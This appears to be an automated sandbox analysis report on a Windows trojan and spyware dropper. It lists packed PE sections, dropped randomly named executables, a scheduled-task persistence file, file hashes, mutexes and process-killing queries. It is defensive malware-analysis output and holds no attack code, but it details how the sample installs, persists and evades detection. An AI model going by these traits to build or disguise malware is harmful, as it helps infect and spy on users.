Source: 760934cb92.exe, 0000000D.00000000.3024294213.0000000000932000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b846f0eb-7
Source: 760934cb92.exe, 0000000D.00000000.3024294213.0000000000932000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_923826cd-a
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name:
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: .idata
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name:
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: .idata
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: 58ce8f976c.exe.8.dr Static PE information: section name:
Source: 58ce8f976c.exe.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: 7451ae0b11.exe.8.dr Static PE information: section name:
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .rsrc
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .idata
Source: 7451ae0b11.exe.8.dr Static PE information: section name:
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name:
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: .idata
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name:
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: .idata
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name:
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name:
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: .idata
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name:
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: .idata
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBFB3F 3_2_00CBFB3F
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBFC9E 3_2_00CBFC9E
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBFCB2 3_2_00CBFCB2
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBFC06 3_2_00CBFC06
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Code function: 10_3_00F8DA12 10_3_00F8DA12
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe BF8C8B70BC76645BA18AB3D6A37B6139AC2D298F058C519AD36D458C4EBC5607
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe A8ADDC675FCC27C94FF9E4775BB2E090F4DA1287AAE6B95CECC65CCF533BC61D
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.2318941071.00000000061B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321072848.00000000061B2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2325890209.00000000062B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2325112299.00000000061B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2323811108.00000000061BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2328660266.00000000063CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2328818863.00000000061C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2325274850.000000000629F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2329250672.00000000062D7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2329117807.00000000061BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320104346.000000000630E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320980871.0000000006266000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2330978821.0000000006410000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320414401.00000000061B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2323436396.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320901410.00000000061B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319323886.00000000061BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321311340.0000000006267000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319490038.00000000061B2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2332248638.00000000062E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2327913567.00000000061BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320807225.0000000006266000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2324477917.0000000006368000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2326966384.00000000062AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2333850293.00000000062E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319144098.00000000061C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2356036567.0000000005E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322985617.0000000006287000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2331219504.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2324787901.0000000006293000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2324168177.00000000061B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321407236.0000000006329000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2327131195.00000000063A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2325637606.0000000006381000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2328040942.00000000062C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2324965431.000000000637E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2323546415.0000000006283000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2334756237.0000000006301000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2333305084.00000000061B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2325391656.00000000061B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2350600484.00000000061BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319741109.00000000061B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321998967.0000000006278000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2328406435.00000000061B2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321509928.00000000061B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2328530945.00000000062BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320205887.00000000061C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2331903265.00000000061B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319828876.000000000625D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319580885.0000000006256000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322733454.00000000061BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319392104.0000000006255000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316092090.0000000006012000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2323308535.0000000006284000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321775763.0000000006276000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2330141871.00000000062DA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319042380.0000000006013000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2325761799.00000000061B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322506016.00000000061B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2323924989.000000000629E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2328984239.00000000062E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2327389098.00000000062B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2327248753.00000000061B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2331671263.0000000006400000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320619889.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2327511039.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2355962076.0000000005C47000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322097921.00000000061B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2324331585.000000000628D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2330789753.00000000062E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2329693433.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2324631309.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316197557.00000000061BD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322197814.0000000006277000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2335284337.00000000061B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2331458473.00000000062D5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2326089558.00000000061B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2330394123.0000000006400000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2329378127.00000000061BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2334441911.00000000061B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2328166137.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321876657.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2329510972.00000000062D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2332752311.00000000061B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2327667575.00000000062B6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319913679.00000000061B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319232081.0000000006260000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2334185859.000000000642C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322613454.0000000006286000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2323700786.000000000635F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2330585494.00000000061BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2333086325.00000000062E5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318794442.0000000006017000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2326375491.00000000061B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320004387.0000000006258000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320313282.000000000626F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322307781.000000000633E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2323189146.00000000061BD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2327787230.00000000063C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2325511887.0000000006294000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316014923.0000000005E57000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2328269170.00000000062B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2326226963.00000000062A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320509839.0000000006263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9977836010971787
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: Section: ZLIB complexity 0.9975146883514986
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: Section: jqddeztg ZLIB complexity 0.9945548160420475
Source: skotes.exe.4.dr Static PE information: Section: ZLIB complexity 0.9975146883514986
Source: skotes.exe.4.dr Static PE information: Section: jqddeztg ZLIB complexity 0.9945548160420475
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9977836010971787
Source: 58ce8f976c.exe.8.dr Static PE information: Section: ZLIB complexity 0.9977836010971787
Source: random[1].exe0.8.dr Static PE information: Section: xpxnzipx ZLIB complexity 0.9946538036142771
Source: 7451ae0b11.exe.8.dr Static PE information: Section: xpxnzipx ZLIB complexity 0.9946538036142771
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: Section: ZLIB complexity 0.9975146883514986
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: Section: jqddeztg ZLIB complexity 0.9945548160420475
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: Section: ZLIB complexity 0.9975146883514986
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: Section: jqddeztg ZLIB complexity 0.9945548160420475
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@82/38@94/14
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7YW0363WEKP7ULOI0QRA.exe.log Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:992:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
